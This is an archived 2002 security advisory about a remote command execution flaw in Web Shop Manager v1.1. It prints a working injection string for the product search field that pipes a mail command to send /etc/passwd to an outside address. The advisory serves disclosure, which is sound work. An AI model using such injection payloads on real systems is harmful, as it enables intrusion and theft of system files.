6th Aug 2002 [SBWID-5603]
COMMAND
Web Shop Manager remote command execution
SYSTEMS AFFECTED
Web Shop Manager v1.1
PROBLEM
Tacettin Karadeniz [tacettinkaradeniz@yahoo.com] found :
The Web Shop Manager allows you to manage a fully functional online
store from a centralized web-based administration system.
Exploit:
It is possible to send server's password file any mail adress by
writing some command in php-webshop-manager product search part. The
command which is written to search part:
|mail CiLeK@xxxkaradenizeregli.net < /etc/passwd
By this command, password file sent to mail adress.
SOLUTION
Check [http://www.webscriptworld.com], no update yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
